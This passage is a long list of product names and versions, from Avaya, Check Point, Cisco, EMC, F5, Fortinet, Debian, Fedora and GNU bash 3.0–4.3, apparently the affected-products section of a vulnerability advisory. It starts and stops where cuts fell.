Utility Services 6.2.4.0.15 \n * Avaya Aura Communication Manager Utility Services 6.2.5.0.15 \n * Avaya Aura Communication Manager Utility Services 6.3 \n * Avaya Aura Conferencing 7.0 \n * Avaya Aura Conferencing 7.0 Standard \n * Avaya Aura Conferencing 7.2 \n * Avaya Aura Conferencing 8.0 \n * Avaya Aura Conferencing Standard Edition 6.0 \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura Experience Portal 7.0 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Messaging 6.1.1 \n * Avaya Aura Messaging 6.2 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1 SP1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura Presence Services 6.1.2 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya Aura Session Manager 5.2.1 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.0.1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura Session Manager 6.1.5 \n * Avaya Aura Session Manager 6.2 \n * Avaya Aura Session Manager 6.2 SP1 \n * Avaya Aura Session Manager 6.2.1 \n * Avaya Aura Session Manager 6.2.2 \n * Avaya Aura Session Manager 6.3 \n * Avaya Aura System Manager 5.2 \n * Avaya Aura System Manager 6.0 \n * Avaya Aura System Manager 6.0 SP1 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Manager 6.1.5 \n * Avaya Aura System Manager 6.2 \n * Avaya Aura System Manager 6.2 SP3 \n * Avaya Aura System Manager 6.3 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 1.1 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya Aura System Platform 6.0.3.0.3 \n * Avaya Aura System Platform 6.0.3.8.3 \n * Avaya Aura System Platform 6.0.3.9.3 \n * Avaya Aura System Platform 6.2 \n * Avaya Aura System Platform 6.2 SP1 \n * Avaya Aura System Platform 6.2.1 \n * Avaya Aura System Platform 6.2.1.0.9 \n * Avaya Aura System Platform 6.3 \n * Avaya B189 IP Conference Phone 1.0 \n * Avaya B189 IP Conference Phone 1.0.0.22 \n * Avaya B189 IP Conference Phone 1.0.0.23 \n * Avaya CMS r17 \n * Avaya Collaboration Pod on VMware vCenter Server Appliance 2.0 \n * Avaya Communication Server 1000E 6.0 \n * Avaya Communication Server 1000E 7.0 \n * Avaya Communication Server 1000E 7.5 \n * Avaya Communication Server 1000E 7.6 \n * Avaya Communication Server 1000E Signaling Server 6.0 \n * Avaya Communication Server 1000E Signaling Server 7.0 \n * Avaya Communication Server 1000E Signaling Server 7.5 \n * Avaya Communication Server 1000E Signaling Server 7.6 \n * Avaya Communication Server 1000M 6.0 \n * Avaya Communication Server 1000M 7.0 \n * Avaya Communication Server 1000M 7.5 \n * Avaya Communication Server 1000M 7.6 \n * Avaya Communication Server 1000M Signaling Server 6.0 \n * Avaya Communication Server 1000M Signaling Server 7.0 \n * Avaya Communication Server 1000M Signaling Server 7.5 \n * Avaya Communication Server 1000M Signaling Server 7.6 \n * Avaya Configuration and Orchestration Manager \n * Avaya Configuration and Orchestration Manager COM 3.1 \n * Avaya Configuration and Orchestration Manager VPS 1.1 \n * Avaya Diagnostic Server 1.0 \n * Avaya Element Management System 6.0 \n * Avaya IP Flow Manager \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya IP Office Application Server 9.0 \n * Avaya IP Office Application Server 9.0 SP 1 \n * Avaya IP Office Application Server 9.0 SP 2 \n * Avaya IP Office Server Edition 8.0 \n * Avaya IP Office Server Edition 8.1 \n * Avaya IP Office Server Edition 9.0 \n * Avaya IQ 4.0 \n * Avaya IQ 4.1.0 \n * Avaya IQ 4.2 \n * Avaya IQ 5 \n * Avaya IQ 5.1 \n * Avaya IQ 5.1.1 \n * Avaya IQ 5.2 \n * Avaya Identity Engines Ignition Server 9.0.2 SP \n * Avaya Meeting Exchange 5.0 \n * Avaya Meeting Exchange 6.0 \n * Avaya Meeting Exchange 6.2 \n * Avaya Message Networking 5.2 \n * Avaya Message Networking 5.2 SP1 \n * Avaya Message Networking 5.2 SP3 \n * Avaya Message Networking 5.2 SP4 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Message Networking 5.2.5 \n * Avaya Message Networking 6.2.0 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Message Storage Server 5 \n * Avaya Messaging Message Storage Server 5.2.1 \n * Avaya Pod Orchestration Suite 1.0 \n * Avaya Pod Orchestration Suite 1.0.1 \n * Avaya Pod Orchestration Suite 2.0 \n * Avaya Proactive Contact 5.0 \n * Avaya Proactive Contact 5.1 \n * Avaya SAL GW virtual app 1.0 \n * Avaya Secure Access Core Concentrator 5.0 \n * Avaya Secure Access Core Concentrator 6.0 \n * Avaya Secure Access Link 1.5 \n * Avaya Secure Access Link 1.8 \n * Avaya Secure Access Link 2.0 \n * Avaya Secure Access Link GAS 5.0 \n * Avaya Secure Access Link GAS 6.0 \n * Avaya Secure Access Link Policy Server 1.5 \n * Avaya Secure Access Remote Access Concentrator 5.0 \n * Avaya Secure Access Remote Access Concentrator 6.0 \n * Avaya Services VM 1.0 \n * Avaya Services VM 2.0 \n * Avaya VPN Gateway 3050 \n * Avaya VPN Gateway 3070 \n * Avaya VPN Gateway 3090 \n * Avaya Virtualization Provisioning Service 1.1 \n * Avaya Visualization Fault and Performance Manager \n * Avaya Wireless LAN 9100 WOS with AOS 7.0.5 \n * Avaya one-X Client Enablement Services 6.1 \n * Avaya one-X Client Enablement Services 6.1.1 \n * Avaya one-X Client Enablement Services 6.1.2 \n * Avaya one-X Client Enablement Services 6.2 \n * Brocade Fibre Channel switches \n * CentOS CentOS 5 \n * Checkpoint Gaia Embedded NGX R65 \n * Checkpoint Gaia Embedded R70 \n * Checkpoint Gaia Embedded R70.1 \n * Checkpoint Gaia Embedded R70.20 \n * Checkpoint Gaia Embedded R70.30 \n * Checkpoint Gaia Embedded R70.40 \n * Checkpoint Gaia Embedded R70.50 \n * Checkpoint Gaia Embedded R71 \n * Checkpoint Gaia Embedded R71.10 \n * Checkpoint Gaia Embedded R71.20 \n * Checkpoint Gaia Embedded R71.30 \n * Checkpoint Gaia Embedded R71.40 \n * Checkpoint Gaia Embedded R71.45 \n * Checkpoint Gaia Embedded R71.50 \n * Checkpoint Gaia Embedded R75 \n * Checkpoint Gaia Embedded R75.10 \n * Checkpoint Gaia Embedded R75.20 \n * Checkpoint Gaia Embedded R75.30 \n * Checkpoint Gaia Embedded R75.40 \n * Checkpoint Gaia Embedded R75.40VS \n * Checkpoint Gaia Embedded R75.45 \n * Checkpoint Gaia Embedded R75.46 \n * Checkpoint Gaia Embedded R75.47 \n * Checkpoint Gaia Embedded R76 \n * Checkpoint Gaia Embedded R77 \n * Checkpoint Gaia Embedded R77.10 \n * Checkpoint Gaia Embedded R77.20 \n * Checkpoint Gaia NGX R65 \n * Checkpoint Gaia Os R75.0 \n * Checkpoint Gaia Os R76.0 \n * Checkpoint Gaia R70 \n * Checkpoint Gaia R70.1 \n * Checkpoint Gaia R70.20 \n * Checkpoint Gaia R70.30 \n * Checkpoint Gaia R70.40 \n * Checkpoint Gaia R70.50 \n * Checkpoint Gaia R71 \n * Checkpoint Gaia R71.10 \n * Checkpoint Gaia R71.20 \n * Checkpoint Gaia R71.30 \n * Checkpoint Gaia R71.40 \n * Checkpoint Gaia R71.45 \n * Checkpoint Gaia R71.50 \n * Checkpoint Gaia R75 \n * Checkpoint Gaia R75.10 \n * Checkpoint Gaia R75.20 \n * Checkpoint Gaia R75.30 \n * Checkpoint Gaia R75.40VS \n * Checkpoint Gaia R75.45 \n * Checkpoint Gaia R75.46 \n * Checkpoint Gaia R75.47 \n * Checkpoint Gaia R76 \n * Checkpoint Gaia R77 \n * Checkpoint Gaia R77.10 \n * Checkpoint Gaia R77.20 \n * Checkpoint IPSO 6.2 NGX R65 \n * Checkpoint IPSO 6.2 R70 \n * Checkpoint IPSO 6.2 R70.1 \n * Checkpoint IPSO 6.2 R70.20 \n * Checkpoint IPSO 6.2 R70.30 \n * Checkpoint IPSO 6.2 R70.40 \n * Checkpoint IPSO 6.2 R70.50 \n * Checkpoint IPSO 6.2 R71 \n * Checkpoint IPSO 6.2 R71.10 \n * Checkpoint IPSO 6.2 R71.20 \n * Checkpoint IPSO 6.2 R71.30 \n * Checkpoint IPSO 6.2 R71.40 \n * Checkpoint IPSO 6.2 R71.45 \n * Checkpoint IPSO 6.2 R71.50 \n * Checkpoint IPSO 6.2 R75 \n * Checkpoint IPSO 6.2 R75.10 \n * Checkpoint IPSO 6.2 R75.20 \n * Checkpoint IPSO 6.2 R75.30 \n * Checkpoint IPSO 6.2 R75.40 \n * Checkpoint IPSO 6.2 R75.40VS \n * Checkpoint IPSO 6.2 R75.45 \n * Checkpoint IPSO 6.2 R75.46 \n * Checkpoint IPSO 6.2 R75.47 \n * Checkpoint IPSO 6.2 R76 \n * Checkpoint IPSO 6.2 R77 \n * Checkpoint IPSO 6.2 R77.10 \n * Checkpoint IPSO 6.2 R77.20 \n * Checkpoint SecurePlatform 2.6 NGX R65 \n * Checkpoint SecurePlatform 2.6 R70 \n * Checkpoint SecurePlatform 2.6 R70.1 \n * Checkpoint SecurePlatform 2.6 R70.20 \n * Checkpoint SecurePlatform 2.6 R70.30 \n * Checkpoint SecurePlatform 2.6 R70.40 \n * Checkpoint SecurePlatform 2.6 R70.50 \n * Checkpoint SecurePlatform 2.6 R71 \n * Checkpoint SecurePlatform 2.6 R71.10 \n * Checkpoint SecurePlatform 2.6 R71.20 \n * Checkpoint SecurePlatform 2.6 R71.30 \n * Checkpoint SecurePlatform 2.6 R71.40 \n * Checkpoint SecurePlatform 2.6 R71.45 \n * Checkpoint SecurePlatform 2.6 R71.50 \n * Checkpoint SecurePlatform 2.6 R75 \n * Checkpoint SecurePlatform 2.6 R75.10 \n * Checkpoint SecurePlatform 2.6 R75.20 \n * Checkpoint SecurePlatform 2.6 R75.30 \n * Checkpoint SecurePlatform 2.6 R75.40 \n * Checkpoint SecurePlatform 2.6 R75.40VS \n * Checkpoint SecurePlatform 2.6 R75.45 \n * Checkpoint SecurePlatform 2.6 R75.46 \n * Checkpoint SecurePlatform 2.6 R75.47 \n * Checkpoint SecurePlatform 2.6 R76 \n * Checkpoint SecurePlatform 2.6 R77 \n * Checkpoint SecurePlatform 2.6 R77.10 \n * Checkpoint SecurePlatform 2.6 R77.20 \n * Checkpoint SecurePlatform NGX R65 \n * Checkpoint SecurePlatform R70 \n * Checkpoint SecurePlatform R70.1 \n * Checkpoint SecurePlatform R70.20 \n * Checkpoint SecurePlatform R70.30 \n * Checkpoint SecurePlatform R70.50 \n * Checkpoint SecurePlatform R71 \n * Checkpoint SecurePlatform R71.10 \n * Checkpoint SecurePlatform R71.20 \n * Checkpoint SecurePlatform R71.40 \n * Checkpoint SecurePlatform R71.45 \n * Checkpoint SecurePlatform R71.50 \n * Checkpoint SecurePlatform R75.10 \n * Checkpoint SecurePlatform R75.20 \n * Checkpoint SecurePlatform R75.30 \n * Checkpoint SecurePlatform R75.40 \n * Checkpoint SecurePlatform R75.40VS \n * Checkpoint SecurePlatform R75.45 \n * Checkpoint SecurePlatform R75.46 \n * Checkpoint SecurePlatform R75.47 \n * Checkpoint SecurePlatform R76 \n * Checkpoint SecurePlatform R77 \n * Checkpoint SecurePlatform R77.10 \n * Checkpoint SecurePlatform R77.20 \n * Cisco ACE Application Control Engine Module for the Cisco Catalyst 6500 \n * Cisco ASA CX and Cisco Prime Security Manager \n * Cisco ASR 1000 Series Routers \n * Cisco ASR 5000 Series \n * Cisco Access Registrar Appliance Cisco Prime Access Registrar Applianc \n * Cisco Application and Content Networking System (ACNS) \n * Cisco AutoBackup Server \n * Cisco Business Edition 3000 \n * Cisco Catalyst 6500 \n * Cisco Cisco ASA CX \n * Cisco Cisco Application Control Engine ACE 4710 \n * Cisco Cisco Application Control Engine ACE30 \n * Cisco Cisco Application Policy Infrastructure Controller \n * Cisco Cisco Clean Access Manager \n * Cisco Cisco Cloud Services \n * Cisco Cisco Edge 300 Digital Media Player \n * Cisco Cisco Intrusion Prevention System Solutions (IPS) \n * Cisco Cisco IronPort Encryption Appliance (IEA) \n * Cisco Cisco Life Cycle Management (LCM) \n * Cisco Cisco NAC Server \n * Cisco Cisco NetAuthenticate \n * Cisco Cisco Network Convergence System 6000 Series Routers 5.0.0 \n * Cisco Cisco Nexus 1000V InterCloud for VMware \n * Cisco Cisco Nexus 9000 \n * Cisco Cisco Nexus 9K \n * Cisco Cisco Show and Share 5(2) \n * Cisco Cisco Smart Care \n * Cisco Cisco TelePresence Video Communication Server Expressway \n * Cisco Cisco Telepresence endpoints 10\" touch panel \n * Cisco Cisco Telepresence endpoints C series \n * Cisco Cisco Telepresence endpoints EX series \n * Cisco Cisco Telepresence endpoints MX series \n * Cisco Cisco Telepresence endpoints MXG2 series \n * Cisco Cisco Telepresence endpoints SX series \n * Cisco Cisco UCS B-Series (Blade) Servers \n * Cisco Cisco UCS Central \n * Cisco Cisco Unified Computing System B-Series (Blade) Servers \n * Cisco Cisco Virtual PGW 2200 Softswitch \n * Cisco Cisco WebEx Node \n * Cisco D9036 Modular Encoding Platform \n * Cisco DC Health Check \n * Cisco Data Center Analytics Framework (DCAF) \n * Cisco Digital Media Manager (DMM) 5.0 \n * Cisco Digital Media Manager (DMM) \n * Cisco Digital Media Players \n * Cisco Download Server (DLS) (RH Based) \n * Cisco Edge 300 Digital Media Player \n * Cisco Edge 340 Digital Media Player \n * Cisco Emergency Responder 1.1.0 \n * Cisco Enterprise Content Delivery Service \n * Cisco Fibre Channel switches \n * Cisco Finesse \n * Cisco GSS 4492R Global Site Selector \n * Cisco Hosted Collaboration Mediation Fulfillment (HCM-F) \n * Cisco IM and Presence Service (CUPS) \n * Cisco IOS 15.4(1)S \n * Cisco IOS 15.4S \n * Cisco IOS \n * Cisco IOS-XE for ASR1k \n * Cisco IOS-XE for ASR903 \n * Cisco IOS-XE for CSR1000v \n * Cisco IOS-XE for Catalyst 3k \n * Cisco IOS-XE for Catalyst 4k \n * Cisco IOS-XE for Catalyst AIR-CT5760 \n * Cisco IOS-XE for ISR4400 \n * Cisco IOS-XR \n * Cisco IP Interoperability and Collaboration System (IPICS) \n * Cisco Identity Services Engine (ISE) \n * Cisco Identity Services Engine \n * Cisco Intelligent Automation for Cloud \n * Cisco Local Collector Appliance (LCA) \n * Cisco MDS 9000 \n * Cisco MDS \n * Cisco MXE Series \n * Cisco Media Experience Engine (MXE) \n * Cisco Media Experience Engines (MXE) \n * Cisco MediaSense \n * Cisco NAC Appliance \n * Cisco Nac Guest Server \n * Cisco NetFlow Collection Agent \n * Cisco Network Analysis Module \n * Cisco Network Configuration and Change Management \n * Cisco Network Convergence System (NCS) 6000 \n * Cisco Network Performance Analytics (NPA) \n * Cisco Nexus 1000 Virtual Supervisor Module (VSM) \n * Cisco Nexus 1000V \n * Cisco Nexus 1000V Switch for Nexus 3000 Series 5.0(3)U1(1) \n * Cisco Nexus 1000V Switch for Nexus 4000 Series 4.1(2)E1(1) \n * Cisco Nexus 1000V Switch for Nexus 5000 Series 4.0(0)N1(1a) \n * Cisco Nexus 1000V Switch for Nexus 7000 Series 4.1.(2) \n * Cisco Nexus 1010 \n * Cisco Nexus 3000 \n * Cisco Nexus 4000 \n * Cisco Nexus 5000 \n * Cisco Nexus 6000 \n * Cisco Nexus 7000 \n * Cisco Nexus 7000 Series Switches \n * Cisco Nexus 9000 running NxOS \n * Cisco OnePK All-in-One VM \n * Cisco Paging Server (Informacast) \n * Cisco Paging Server \n * Cisco Physical Access Gateway \n * Cisco Physical Access Manager \n * Cisco PowerVu D9190 Conditional Access Manager (PCAM) \n * Cisco Prime Collaboration Assurance \n * Cisco Prime Collaboration Deployment \n * Cisco Prime Collaboration Provisioning \n * Cisco Prime IP Express \n * Cisco Prime Infrastructure - \n * Cisco Prime Infrastructure 1.2.1 \n * Cisco Prime LAN Management Solution \n * Cisco Prime License Manager \n * Cisco Prime Network Services Controller (PNSC) \n * Cisco Prime Service Catalog Virtual Appliance \n * Cisco Proactive Network Operations Center \n * Cisco Quantum SON Suite \n * Cisco Quantum Virtualized Packet Core \n * Cisco Secure Access Control Server (ACS) \n * Cisco Secure Access Control Server \n * Cisco Service Control Engine 1010 \n * Cisco Service Control Engine 8000 \n * Cisco Services Provisioning Platform (SPP) \n * Cisco Show and Share (SnS) \n * Cisco SocialMiner \n * Cisco Standalone rack server CIMC \n * Cisco Tandberg Codian ISDN GW 3210 \n * Cisco Tandberg Codian ISDN GW 3220 \n * Cisco Tandberg Codian ISDN GW 3240 \n * Cisco Tandberg Codian MSE 8320 model \n * Cisco TelePresence 1310 \n * Cisco TelePresence Conductor \n * Cisco TelePresence Exchange System (CTX) \n * Cisco TelePresence IP Gateway Series \n * Cisco TelePresence IP VCR Series \n * Cisco TelePresence ISDN GW 3241 \n * Cisco TelePresence ISDN GW MSE 8321 \n * Cisco TelePresence ISDN Link \n * Cisco TelePresence Manager (CTSMan) \n * Cisco TelePresence Multipoint Switch \n * Cisco TelePresence Recording Server (CTRS) \n * Cisco TelePresence System 1000 \n * Cisco TelePresence System 1100 \n * Cisco TelePresence System 1300 \n * Cisco TelePresence System 3000 Series \n * Cisco TelePresence System 500-32 \n * Cisco TelePresence System 500-37 \n * Cisco TelePresence TE Software (for E20 - EoL) \n * Cisco TelePresence TE Software \n * Cisco TelePresence TX 9000 Series \n * Cisco TelePresence Video Communication Server (VCS) \n * Cisco TelePresence Video Communication Server (VCS/Expressway) \n * Cisco UCS Director \n * Cisco UCS Invicta Appliance \n * Cisco USC Invicta Series Autosupport Portal \n * Cisco Unified Communications Domain Manager \n * Cisco Unified Communications Manager (CUCM) \n * Cisco Unified Communications Manager (UCM) \n * Cisco Unified Communications Manager Session Management Edition (SME) \n * Cisco Unified Computing System (UCS) \n * Cisco Unified Contact Center Express (UCCX) \n * Cisco Unified Contact Center Express \n * Cisco Unified IP Phone \n * Cisco Unified Intelligence Center (CUIC) \n * Cisco Unified Intelligence Center \n * Cisco Unified Presence Server \n * Cisco Unity Connection (UC) \n * Cisco Unity Connection \n * Cisco Universal Small Cell CloudBase \n * Cisco VDS Service Broker \n * Cisco Video Distribution Suite for Internet Streaming VDS-IS \n * Cisco Video Surveillance Media Server \n * Cisco Videoscape Conductor \n * Cisco Videoscape Distribution Suite Transparent Caching \n * Cisco Virtual Security Gateway for Microsoft Hyper-V \n * Cisco Virtualization Experience Client 6215 \n * Cisco Visual Quality Experience Server \n * Cisco Visual Quality Experience Tools Server \n * Cisco Web Element Manager \n * Cisco WebEx Meetings Server (CWMS) \n * Cisco WebEx PCNow \n * Cisco Wide Area Application Services (WAAS) \n * Cisco Wireless Lan Controller (WLC) \n * Computer Associates API Management \n * Computer Associates Application Performance Management \n * Computer Associates Application Performance Management Cloud Monitor \n * Computer Associates Customer Experience Manager (CEM) Transaction Impact Monitor \n * Computer Associates Layer 7 API Gateway \n * Computer Associates Layer 7 API Management Portal \n * Computer Associates Layer 7 Mobile Access Gateway \n * Computer Associates User Activity Reporting Module (Enterprise Log Manager) \n * Debian Linux 6.0 amd64 \n * Debian Linux 6.0 arm \n * Debian Linux 6.0 ia-32 \n * Debian Linux 6.0 ia-64 \n * Debian Linux 6.0 mips \n * Debian Linux 6.0 powerpc \n * Debian Linux 6.0 s/390 \n * Debian Linux 6.0 sparc \n * Digi ConnectPort LTS \n * Digi Digi CM \n * Digi Digi Passport \n * EMC Avamar 4.1 \n * EMC Avamar 4.1.0-1470 \n * EMC Avamar 4.1.1 \n * EMC Avamar 4.1.1-340 \n * EMC Avamar 4.1.2 \n * EMC Avamar 4.1.2-33 \n * EMC Avamar 5.0 \n * EMC Avamar 5.0 SP1 \n * EMC Avamar 5.0 SP2 \n * EMC Avamar 5.0.0-407 \n * EMC Avamar 5.0.1 \n * EMC Avamar 5.0.1-32 \n * EMC Avamar 5.0.2 \n * EMC Avamar 5.0.2-41 \n * EMC Avamar 5.0.3 \n * EMC Avamar 5.0.3-29 \n * EMC Avamar 5.0.4 \n * EMC Avamar 5.0.4-26 \n * EMC Avamar 6.0 \n * EMC Avamar 6.0.1 \n * EMC Avamar 6.0.2 \n * EMC Avamar 6.0.3 \n * EMC Avamar 6.1 \n * EMC Avamar 6.1.1 \n * EMC Avamar 6.1.1-87 \n * EMC Avamar 6.1.100-333 \n * EMC Avamar 6.1.100-402 \n * EMC Avamar 6.1.101-89 \n * EMC Avamar Server 5.0 \n * EMC Avamar Server 6.0 \n * EMC Avamar Server 7.0 \n * EMC Celerra \n * EMC Isilon OneFS \n * EMC Kazeon 4.7 \n * EMC Kazeon 4.8 \n * EMC Supplier Exchange \n * EMC VNX1 \n * EMC VNX2 \n * EMC VNXe 3200 \n * EMC VNXe \n * EMC VPLEX \n * EMC VPLEX-VE \n * F5 ARX 6.0.0 \n * F5 ARX 6.1.0 \n * F5 ARX 6.1.1 \n * F5 ARX 6.2.0 \n * F5 ARX 6.3.0 \n * F5 ARX 6.4.0 \n * F5 BIG-IP AAM 11.4.0 \n * F5 BIG-IP AAM 11.4.1 \n * F5 BIG-IP AAM 11.5.0 \n * F5 BIG-IP AAM 11.5.1 \n * F5 BIG-IP AAM 11.6.0 \n * F5 BIG-IP AFM 11.2.1 \n * F5 BIG-IP AFM 11.3.0 \n * F5 BIG-IP AFM 11.4.1 \n * F5 BIG-IP AFM 11.5.0 \n * F5 BIG-IP AFM 11.5.1 \n * F5 BIG-IP AFM 11.6.0 \n * F5 BIG-IP APM 10.0.0 \n * F5 BIG-IP APM 10.1 \n * F5 BIG-IP APM 10.2.1 \n * F5 BIG-IP APM 10.2.2 \n * F5 BIG-IP APM 10.2.4 \n * F5 BIG-IP APM 11.0.0 \n * F5 BIG-IP APM 11.1.0 \n * F5 BIG-IP APM 11.2.0 \n * F5 BIG-IP APM 11.2.1 \n * F5 BIG-IP APM 11.3.0 \n * F5 BIG-IP APM 11.4.0 \n * F5 BIG-IP APM 11.4.1 \n * F5 BIG-IP APM 11.5.0 \n * F5 BIG-IP APM 11.5.1 \n * F5 BIG-IP APM 11.6.0 \n * F5 BIG-IP ASM 10.0.0 \n * F5 BIG-IP ASM 10.2.1 \n * F5 BIG-IP ASM 10.2.2 \n * F5 BIG-IP ASM 10.2.4 \n * F5 BIG-IP ASM 11.0.0 \n * F5 BIG-IP ASM 11.1.0 \n * F5 BIG-IP ASM 11.2.0 \n * F5 BIG-IP ASM 11.2.1 \n * F5 BIG-IP ASM 11.3.0 \n * F5 BIG-IP ASM 11.4.1 \n * F5 BIG-IP ASM 11.5.0 \n * F5 BIG-IP ASM 11.5.1 \n * F5 BIG-IP ASM 11.6.0 \n * F5 BIG-IP Analytics 11.0.0 \n * F5 BIG-IP Analytics 11.1.0 \n * F5 BIG-IP Analytics 11.2.0 \n * F5 BIG-IP Analytics 11.2.1 \n * F5 BIG-IP Analytics 11.3.0 \n * F5 BIG-IP Analytics 11.4.1 \n * F5 BIG-IP Analytics 11.5.0 \n * F5 BIG-IP Analytics 11.5.1 \n * F5 BIG-IP Analytics 11.6.0 \n * F5 BIG-IP Edge Gateway 10.1.0 \n * F5 BIG-IP Edge Gateway 10.2.1 \n * F5 BIG-IP Edge Gateway 10.2.2 \n * F5 BIG-IP Edge Gateway 10.2.4 \n * F5 BIG-IP Edge Gateway 11.0.0 \n * F5 BIG-IP Edge Gateway 11.1.0 \n * F5 BIG-IP Edge Gateway 11.2.0 \n * F5 BIG-IP Edge Gateway 11.2.1 \n * F5 BIG-IP Edge Gateway 11.3.0 \n * F5 BIG-IP Edge Gateway 11.4.1 \n * F5 BIG-IP Edge Gateway 11.5.0 \n * F5 BIG-IP Edge Gateway 11.5.1 \n * F5 BIG-IP LTM 10.0.0 \n * F5 BIG-IP LTM 10.2.1 \n * F5 BIG-IP LTM 10.2.2 \n * F5 BIG-IP LTM 10.2.4 \n * F5 BIG-IP LTM 11.0.0 \n * F5 BIG-IP LTM 11.1.0 \n * F5 BIG-IP LTM 11.2.0 \n * F5 BIG-IP LTM 11.2.1 \n * F5 BIG-IP LTM 11.3.0 \n * F5 BIG-IP LTM 11.4.1 \n * F5 BIG-IP LTM 11.5 \n * F5 BIG-IP LTM 11.5.0 \n * F5 BIG-IP LTM 11.5.1 \n * F5 BIG-IP LTM 11.6.0 \n * F5 BIG-IP Link Controller 10.0.0 \n * F5 BIG-IP Link Controller 10.2.1 \n * F5 BIG-IP Link Controller 10.2.2 \n * F5 BIG-IP Link Controller 10.2.4 \n * F5 BIG-IP Link Controller 11.0.0 \n * F5 BIG-IP Link Controller 11.1.0 \n * F5 BIG-IP Link Controller 11.2.0 \n * F5 BIG-IP Link Controller 11.2.1 \n * F5 BIG-IP Link Controller 11.3.0 \n * F5 BIG-IP Link Controller 11.4.1 \n * F5 BIG-IP Link Controller 11.5.0 \n * F5 BIG-IP Link Controller 11.5.1 \n * F5 BIG-IP Link Controller 11.6.0 \n * F5 BIG-IP PEM 11.3.0 \n * F5 BIG-IP PEM 11.4.1 \n * F5 BIG-IP PEM 11.5.0 \n * F5 BIG-IP PEM 11.5.1 \n * F5 BIG-IP PEM 11.6.0 \n * F5 BIG-IP PSM 10.0.0 \n * F5 BIG-IP PSM 10.2.1 \n * F5 BIG-IP PSM 10.2.4 \n * F5 BIG-IP PSM 11.0.0 \n * F5 BIG-IP PSM 11.1.0 \n * F5 BIG-IP PSM 11.2.0 \n * F5 BIG-IP PSM 11.2.1 \n * F5 BIG-IP PSM 11.3.0 \n * F5 BIG-IP PSM 11.4.1 \n * F5 BIG-IP PSM 11.5.0 \n * F5 BIG-IP PSM 11.5.1 \n * F5 BIG-IP WOM 10.0.0 \n * F5 BIG-IP WOM 10.2.1 \n * F5 BIG-IP WOM 10.2.2 \n * F5 BIG-IP WOM 10.2.4 \n * F5 BIG-IP WOM 11.0.0 \n * F5 BIG-IP WOM 11.1.0 \n * F5 BIG-IP WOM 11.2.0 \n * F5 BIG-IP WOM 11.2.1 \n * F5 BIG-IP WOM 11.3.0 \n * F5 BIG-IP WOM 11.5.1 \n * F5 BIG-IP WebAccelerator 10.0.0 \n * F5 BIG-IP WebAccelerator 10.2.1 \n * F5 BIG-IP WebAccelerator 10.2.4 \n * F5 BIG-IP WebAccelerator 11.0.0 \n * F5 BIG-IP WebAccelerator 11.1.0 \n * F5 BIG-IP WebAccelerator 11.2.0 \n * F5 BIG-IP WebAccelerator 11.2.1 \n * F5 BIG-IP WebAccelerator 11.3.0 \n * F5 BIG-IP WebAccelerator 11.5.1 \n * F5 BIG-IQ Cloud 4.0.0 \n * F5 BIG-IQ Cloud 4.1.0 \n * F5 BIG-IQ Cloud 4.2.0 \n * F5 BIG-IQ Cloud 4.3.0 \n * F5 BIG-IQ Device 4.2.0 \n * F5 BIG-IQ Device 4.3.0 \n * F5 BIG-IQ Security 4.0.0 \n * F5 BIG-IQ Security 4.1.0 \n * F5 BIG-IQ Security 4.2.0 \n * F5 BIG-IQ Security 4.3.0 \n * F5 Enterprise Manager 2.1.0 \n * F5 Enterprise Manager 2.3.0 \n * F5 Enterprise Manager 3.0.0 \n * F5 Enterprise Manager 3.1.0 \n * F5 Enterprise Manager 3.1.1 \n * F5 Traffix SDC 3.3.2 \n * F5 Traffix SDC 3.4.1 \n * F5 Traffix SDC 3.5.1 \n * F5 Traffix SDC 4.0.0 \n * F5 Traffix SDC 4.0.5 \n * F5 Traffix SDC 4.1.0 \n * Fedoraproject Fedora 19 \n * Fedoraproject Fedora 20 \n * Fedoraproject Fedora 21 \n * Fortinet AscenLink 7.0 \n * Fortinet AscenLink 7.1-B5599 \n * Fortinet AscenLink 7.1-B5745 \n * Fortinet FortiAnalyzer 5.0.4 \n * Fortinet FortiAnalyzer 5.0.5 \n * Fortinet FortiAnalyzer 5.0.7 \n * Fortinet FortiAnalyzer 5.2.0 \n * Fortinet FortiAuthenticator \n * Fortinet FortiDB \n * Fortinet FortiManager 4.3 \n * Fortinet FortiManager 5.0.7 \n * Fortinet FortiManager 5.2.0 \n * GNU GNU bash 3.0 \n * GNU GNU bash 3.0.16 \n * GNU GNU bash 3.00.0(2) \n * GNU GNU bash 3.1 \n * GNU GNU bash 3.2 \n * GNU GNU bash 3.2.48 \n * GNU GNU bash 4.0 \n * GNU GNU bash 4.0 RC1 \n * GNU GNU bash 4.1 \n * GNU GNU bash 4.2 \n * GNU GNU bash 4.3 \n * Gentoo Linux \n * Google Chrome 0.1.38.1 \n * Google Chrome 